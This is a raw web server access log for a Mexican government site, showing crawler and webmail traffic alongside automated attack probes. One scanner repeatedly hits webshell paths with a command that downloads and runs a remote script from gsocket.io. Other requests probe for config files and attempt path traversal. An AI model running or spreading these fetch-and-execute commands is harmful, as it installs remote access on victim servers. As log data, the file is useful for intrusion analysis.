52.167.144.203 - - [05/Feb/2025:12:33:07 -0600] "GET /noticias&idnoti=458?q= HTTP/1.1" 301 264 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:33:08 -0600] "GET /aulavirtual/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:33:12 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.199 - - [05/Feb/2025:12:33:23 -0600] "GET /0440952531.shtml HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.10.194.36 - - [05/Feb/2025:12:33:28 -0600] "POST /wp-login.php HTTP/1.1" 301 247 "https://www.tjamich.gob.mx/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:33:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:33:35 -0600] "GET /campus/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:33:35 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:33:55 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.72.140 - - [05/Feb/2025:12:34:17 -0600] "GET /jopc/a19812.html HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:34:20 -0600] "GET /campus/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
114.119.150.32 - - [05/Feb/2025:12:34:31 -0600] "GET /sisofi_2018/uploads/14-07-2021/JA-0109-2020-III.pdf HTTP/1.1" 301 289 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
187.195.110.68 - - [05/Feb/2025:12:34:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:34:36 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:34:42 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:34:53 -0600] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:34:57 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
189.243.238.36 - - [05/Feb/2025:12:35:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12364 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:35:11 -0600] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:35:22 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:35:28 -0600] "GET /?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.200 - - [05/Feb/2025:12:35:31 -0600] "GET /product/who88?c=g&l=33050 HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
187.195.110.68 - - [05/Feb/2025:12:35:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:35:37 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
66.249.77.199 - - [05/Feb/2025:12:35:39 -0600] "GET /208641055124.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
134.209.102.237 - - [05/Feb/2025:12:35:50 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
186.96.13.27 - - [05/Feb/2025:12:35:52 -0600] "GET /Igualdad-de-Genero/img-tjam/portada_comite.png HTTP/1.1" 301 284 "https://www.bing.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"
194.50.16.252 - - [05/Feb/2025:12:36:03 -0600] "GET /appsettings.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0"
134.209.102.237 - - [05/Feb/2025:12:36:03 -0600] "GET /?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:36:06 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
194.50.16.252 - - [05/Feb/2025:12:36:19 -0600] "GET /appsettings.Production.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Tokai/21.1.294403 Version/17.2 Safari/605.1.15"
134.209.102.237 - - [05/Feb/2025:12:36:23 -0600] "GET /command.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
194.50.16.252 - - [05/Feb/2025:12:36:26 -0600] "GET /api/appsettings.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
194.50.16.252 - - [05/Feb/2025:12:36:31 -0600] "GET /api/appsettings.Production.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0"
187.195.110.68 - - [05/Feb/2025:12:36:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:36:38 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:36:38 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:36:49 -0600] "GET /cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
189.243.238.36 - - [05/Feb/2025:12:37:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12366 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:37:02 -0600] "GET /command.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
187.195.110.68 - - [05/Feb/2025:12:37:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:37:38 -0600] "GET /img/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:37:39 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:37:39 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:37:45 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:37:49 -0600] "GET /upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:37:52 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:38:01 -0600] "GET /uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.198 - - [05/Feb/2025:12:38:07 -0600] "GET /96711538492.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
134.209.102.237 - - [05/Feb/2025:12:38:17 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:38:28 -0600] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.110.68 - - [05/Feb/2025:12:38:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:38:40 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
200.68.166.37 - - [05/Feb/2025:12:38:41 -0600] "-" 408 - "-" "-"
200.68.166.37 - - [05/Feb/2025:12:38:41 -0600] "-" 408 - "-" "-"
134.209.102.237 - - [05/Feb/2025:12:38:48 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:38:56 -0600] "GET /wp-content/uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
189.243.238.36 - - [05/Feb/2025:12:39:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12367 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:39:02 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
52.167.144.203 - - [05/Feb/2025:12:39:02 -0600] "GET /sisofi_2018/uploads/06-08-2019/view-box_2021/pdf/view-box_2021/pdf/9a-7722.pdf HTTP/1.1" 301 316 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:39:06 -0600] "GET /wp-content/upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:39:09 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:39:11 -0600] "GET /wp-content/plugins/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
178.128.55.169 - - [05/Feb/2025:12:39:13 -0600] "GET /img/noticias/192_covid-19-2.jpg HTTP/1.1" 301 269 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/119.0.2151.105 Version/17.0 Mobile/15E148 Safari/604.1"
134.209.102.237 - - [05/Feb/2025:12:39:18 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.200 - - [05/Feb/2025:12:39:24 -0600] "GET /992231606262.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:39:25 -0600] "GET /wp-admin/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:39:34 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.110.68 - - [05/Feb/2025:12:39:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:39:40 -0600] "GET /css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:39:42 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:39:49 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:40:00 -0600] "GET /js/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:40:12 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:40:22 -0600] "GET /foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:40:29 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.198 - - [05/Feb/2025:12:40:34 -0600] "GET /223711553130.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:40:35 -0600] "GET /img/files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.110.68 - - [05/Feb/2025:12:40:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:40:41 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:40:42 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
69.171.234.14 - - [05/Feb/2025:12:40:49 -0600] "GET /Noticias&idnoti=463 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.4 - - [05/Feb/2025:12:40:50 -0600] "GET /Noticias&idnoti=463 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.21 - - [05/Feb/2025:12:40:52 -0600] "GET /Juicio-en-Linea HTTP/1.1" 301 253 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.5 - - [05/Feb/2025:12:40:52 -0600] "GET /Juicio-en-Linea HTTP/1.1" 301 253 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.16 - - [05/Feb/2025:12:40:52 -0600] "GET /Juicio-en-Linea HTTP/1.1" 301 253 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.17 - - [05/Feb/2025:12:40:52 -0600] "GET /Juicio-en-Linea HTTP/1.1" 301 253 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
186.96.13.27 - - [05/Feb/2025:12:40:53 -0600] "-" 408 - "-" "-"
134.209.102.237 - - [05/Feb/2025:12:40:55 -0600] "GET /files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
189.243.238.36 - - [05/Feb/2025:12:41:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:41:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12367 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
4.227.36.124 - - [05/Feb/2025:12:41:13 -0600] "GET /robots.txt HTTP/1.1" 301 248 "http://www.tjamich.gob.mx/robots.txt" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.124 - - [05/Feb/2025:12:41:17 -0600] "GET /robots.txt HTTP/1.1" 301 248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.177 - - [05/Feb/2025:12:41:28 -0600] "GET /) HTTP/1.1" 301 239 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
187.195.110.68 - - [05/Feb/2025:12:41:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
89.185.25.132 - - [05/Feb/2025:12:41:36 -0600] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1" 301 247 "-" "-"
40.77.167.71 - - [05/Feb/2025:12:41:37 -0600] "GET /legislacion/pdf/view-box_2021/pdf/Ubicacion HTTP/1.1" 301 281 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:41:41 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:41:43 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
66.249.77.198 - - [05/Feb/2025:12:41:45 -0600] "GET /Noticias&idnoti=209&t=TJAM-amplia-suspension-de-labores-al-19-de-febrero HTTP/1.1" 301 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:41:55 -0600] "GET /.tmb/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:42:03 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:42:08 -0600] "GET /tmp/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:42:16 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.72.140 - - [05/Feb/2025:12:42:19 -0600] "GET /?_ga=2.198040047.1958808748.1721886654-862398307.1699453578&_bdsid=2ulvIJ.n~ZXCIW.1721886656070.1721886848&_bd_prev_page=https://tjamich.gob.mx/detail.php?papn/p57865.html HTTP/1.1" 301 417 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:42:33 -0600] "GET /server/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.110.68 - - [05/Feb/2025:12:42:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.199 - - [05/Feb/2025:12:42:38 -0600] "GET / HTTP/1.1" 301 238 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.116.142 - - [05/Feb/2025:12:42:44 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
173.252.79.7 - - [05/Feb/2025:12:42:50 -0600] "GET /img/Logo-TJAM.png HTTP/1.1" 301 255 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
